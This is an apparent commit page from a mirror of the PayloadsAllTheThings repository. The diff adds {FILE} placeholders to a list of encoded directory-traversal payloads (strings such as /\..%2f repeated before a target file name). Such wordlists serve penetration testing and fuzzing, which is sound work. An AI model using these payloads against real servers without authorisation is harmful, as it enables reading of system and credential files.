mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-12-12 07:40:34 -08:00
Fixed missing {FILE} placeholders
The bottom few options were missing the {FILE} placeholders.
This fixes them.
This commit is contained in:
@@ -877,11 +877,11 @@
|
||||
/..\..\\..\..\\..\..\\\{FILE}
|
||||
/..\..\\..\..\\..\..\\..\\\{FILE}
|
||||
/..\..\\..\..\\..\..\\..\..\\\{FILE}
|
||||
/\..%2f
|
||||
/\..%2f\..%2f
|
||||
/\..%2f\..%2f\..%2f
|
||||
/\..%2f\..%2f\..%2f\..%2f
|
||||
/\..%2f\..%2f\..%2f\..%2f\..%2f
|
||||
/\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f
|
||||
/\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f
|
||||
/\..%2f{FILE}
|
||||
/\..%2f\..%2f{FILE}
|
||||
/\..%2f\..%2f\..%2f{FILE}
|
||||
/\..%2f\..%2f\..%2f\..%2f{FILE}
|
||||
/\..%2f\..%2f\..%2f\..%2f\..%2f{FILE}
|
||||
/\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f{FILE}
|
||||
/\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f{FILE}
|
||||
/\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f{FILE}
|
||||
|
||||
Reference in New Issue
Block a user